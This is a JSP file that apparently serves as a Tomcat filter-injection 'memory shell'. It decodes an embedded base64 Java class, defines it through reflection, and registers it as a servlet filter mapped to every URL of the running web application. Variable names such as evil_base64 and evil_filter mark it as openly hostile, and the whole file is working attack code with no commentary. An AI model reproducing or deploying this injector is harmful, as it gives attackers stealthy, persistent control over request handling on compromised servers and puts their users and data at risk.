<%



org.apache.catalina.core.StandardContext context = (org.apache.catalina.core.StandardContext)((org.apache.catalina.WebResourceRoot)((org.apache.catalina.loader.WebappClassLoaderBase)Thread.currentThread().getContextClassLoader()).getResources()).getContext();
java.lang.ClassLoader classLoader = (java.lang.ClassLoader) Thread.currentThread().getContextClassLoader();







String evil_base64="yv66vgAAADQAhgoAFgA9CAA+CwA/AEAIAEELAD8AQggALQsAQwBECwA/AEUIAEYKAEcASAsASQBKBwBLCgBMAE0IAE4KAE8AUAoAUQBSCgBRAFMJAFQAVQoAVgBXCgBYAFkKAFoAWwcAXAcAXQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAKTE15RmlsdGVyOwEABGluaXQBAB8oTGphdmF4L3NlcnZsZXQvRmlsdGVyQ29uZmlnOylWAQAMZmlsdGVyQ29uZmlnAQAcTGphdmF4L3NlcnZsZXQvRmlsdGVyQ29uZmlnOwEACkV4Y2VwdGlvbnMHAF4BAAhkb0ZpbHRlcgEAWyhMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdDtMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2U7TGphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW47KVYBAA5zZXJ2bGV0UmVxdWVzdAEAHkxqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXF1ZXN0OwEAD3NlcnZsZXRSZXNwb25zZQEAH0xqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXNwb25zZTsBAAtmaWx0ZXJDaGFpbgEAG0xqYXZheC9zZXJ2bGV0L0ZpbHRlckNoYWluOwEAA2NtZAEAEkxqYXZhL2xhbmcvU3RyaW5nOwEADVN0YWNrTWFwVGFibGUHAF8HAGABAAdkZXN0cm95AQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAC2lucHV0U3RyZWFtAQAVTGphdmEvaW8vSW5wdXRTdHJlYW07AQAFYnl0ZXMBAAJbQgEAClNvdXJjZUZpbGUBAA1NeUZpbHRlci5qYXZhDAAYABkBAAV1dGYtOAcAYQwAYgBjAQAXdGV4dC9odG1sO2NoYXJzZXQ9VVRGLTgMAGQAYwcAZQwAZgBnDABoAGkBAAx3aGF0dGhlZnVjayEHAGoMAGsAYwcAbAwAJQBtAQAITXlGaWx0ZXIHAG4MAG8AcAEADm15RmlsdGVyLmNsYXNzBwBxDAByAHMHAHQMAHUAdgwAdwB4BwB5DAB6AHsHAHwMAH0AgAcAgQwAggCDBwCEDACFAGMBABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YXgvc2VydmxldC9GaWx0ZXIBAB5qYXZheC9zZXJ2bGV0L1NlcnZsZXRFeGNlcHRpb24BABBqYXZhL2xhbmcvU3RyaW5nAQATamF2YS9pby9JT0V4Y2VwdGlvbgEAHWphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlAQAUc2V0Q2hhcmFjdGVyRW5jb2RpbmcBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAA5zZXRDb250ZW50VHlwZQEAHGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3QBAAxnZXRQYXJhbWV0ZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7AQATamF2YS9pby9QcmludFdyaXRlcgEABXdyaXRlAQAZamF2YXgvc2VydmxldC9GaWx0ZXJDaGFpbgEAQChMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdDtMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2U7KVYBAA9qYXZhL2xhbmcvQ2xhc3MBAA5nZXRDbGFzc0xvYWRlcgEAGSgpTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBABVqYXZhL2xhbmcvQ2xhc3NMb2FkZXIBABNnZXRSZXNvdXJjZUFzU3RyZWFtAQApKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9pby9JbnB1dFN0cmVhbTsBABNqYXZhL2lvL0lucHV0U3RyZWFtAQAJYXZhaWxhYmxlAQADKClJAQAEcmVhZAEABShbQilJAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAEGphdmEvdXRpbC9CYXNlNjQBAApnZXRFbmNvZGVyAQAHRW5jb2RlcgEADElubmVyQ2xhc3NlcwEAHCgpTGphdmEvdXRpbC9CYXNlNjQkRW5jb2RlcjsBABhqYXZhL3V0aWwvQmFzZTY0JEVuY29kZXIBAA5lbmNvZGVUb1N0cmluZwEAFihbQilMamF2YS9sYW5nL1N0cmluZzsBABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgAhAAwAFgABABcAAAAFAAEAGAAZAAEAGgAAAC8AAQABAAAABSq3AAGxAAAAAgAbAAAABgABAAAABwAcAAAADAABAAAABQAdAB4AAAABAB8AIAACABoAAAA1AAAAAgAAAAGxAAAAAgAbAAAABgABAAAACgAcAAAAFgACAAAAAQAdAB4AAAAAAAEAIQAiAAEAIwAAAAQAAQAkAAEAJQAmAAIAGgAAAKsAAwAFAAAAMywSArkAAwIALBIEuQAFAgArEga5AAcCADoEGQTGAA4suQAIAQASCbYACi0rLLkACwMAsQAAAAMAGwAAAB4ABwAAAA0ACAAOABAADwAaABAAHwARACoAFQAyABYAHAAAADQABQAAADMAHQAeAAAAAAAzACcAKAABAAAAMwApACoAAgAAADMAKwAsAAMAGgAZAC0ALgAEAC8AAAAIAAH8ACoHADAAIwAAAAYAAgAxACQAAQAyABkAAQAaAAAAKwAAAAEAAAABsQAAAAIAGwAAAAYAAQAAABoAHAAAAAwAAQAAAAEAHQAeAAAACQAzADQAAgAaAAAAdAADAAMAAAAmEgy2AA0SDrYAD0wrtgAQvAhNKyy2ABFXsgASuAATLLYAFLYAFbEAAAACABsAAAAWAAUAAAAdAAsAHgASAB8AGAAgACUAIgAcAAAAIAADAAAAJgA1ADYAAAALABsANwA4AAEAEgAUADkAOgACACMAAAAEAAEAMQACADsAAAACADwAfwAAAAoAAQBYAFYAfgAJ";
byte[] evil_bytes = java.util.Base64.getDecoder().decode(evil_base64);
java.lang.reflect.Method defineClass = java.lang.ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
defineClass.setAccessible(true);
Class evil_class = null;
try{
	  evil_class = (Class) defineClass.invoke(classLoader, evil_bytes, 0, evil_bytes.length);
}catch(Exception ex) {
      evil_class = Class.forName("MyFilter");
}	

javax.servlet.Filter evil_filter = (javax.servlet.Filter)evil_class.newInstance();

java.lang.reflect.Field classesF = java.lang.ClassLoader.class.getDeclaredField("classes");
classesF.setAccessible(true);
java.util.Vector classes = (java.util.Vector) classesF.get(Thread.currentThread().getContextClassLoader());


org.apache.tomcat.util.descriptor.web.FilterDef filterDef = (org.apache.tomcat.util.descriptor.web.FilterDef) Class.forName("org.apache.tomcat.util.descriptor.web.FilterDef").newInstance();
filterDef.setFilterName("MyFilter");
filterDef.setFilter(evil_filter);
context.addFilterDef(filterDef);

java.lang.reflect.Constructor<?>[] constructors = org.apache.catalina.core.ApplicationFilterConfig.class.getDeclaredConstructors();
constructors[0].setAccessible(true);
org.apache.catalina.core.ApplicationFilterConfig applicationFilterConfig = (org.apache.catalina.core.ApplicationFilterConfig) constructors[0].newInstance(context, filterDef);

java.lang.reflect.Field filterConfigsF = context.getClass().getDeclaredField("filterConfigs");
filterConfigsF.setAccessible(true);
java.util.Map<String, org.apache.catalina.core.ApplicationFilterConfig> filterConfigs = (java.util.Map) filterConfigsF.get(context);
filterConfigs.put("MyFilter",applicationFilterConfig);

org.apache.tomcat.util.descriptor.web.FilterMap filterMap = (org.apache.tomcat.util.descriptor.web.FilterMap) Class.forName("org.apache.tomcat.util.descriptor.web.FilterMap").newInstance();
filterMap.setFilterName("MyFilter");
filterMap.addURLPattern("/*");
context.addFilterMap(filterMap);


%>
